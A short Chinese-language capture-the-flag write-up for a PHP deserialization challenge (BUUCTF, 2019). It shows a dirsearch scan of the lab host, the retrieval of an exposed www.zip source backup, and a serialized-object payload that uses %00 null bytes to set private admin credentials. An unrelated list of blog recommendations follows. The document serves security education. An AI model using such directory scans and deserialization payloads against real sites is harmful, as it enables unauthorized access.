[极客大挑战 2019]PHP1

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

相关推荐
PoppyBu1 小时前
Ubuntu20.04版本上安装最新版本的scrcpy工具
android·ubuntu
执念、坚持1 小时前
Property Service源码分析
android
用户41659673693551 小时前
在 ViewPager2 + Fragment 架构中玩转 Jetpack Compose
android
GoldenPlayer1 小时前
Gradle脚本执行
android
用户74589002079541 小时前
Android进程模型基础
android
we1less2 小时前
[audio] Audio debug
android
Jomurphys2 小时前
AndroidStudio - TOML
android
有位神秘人2 小时前
Android最新动态权限申请工具
android
lxysbly2 小时前
psp模拟器安卓版下载汉化版2026
android
2501_941822752 小时前
面向灰度发布与风险隔离的互联网系统演进策略与多语言工程实践分享方法论记录思考汇总稿件
android·java·人工智能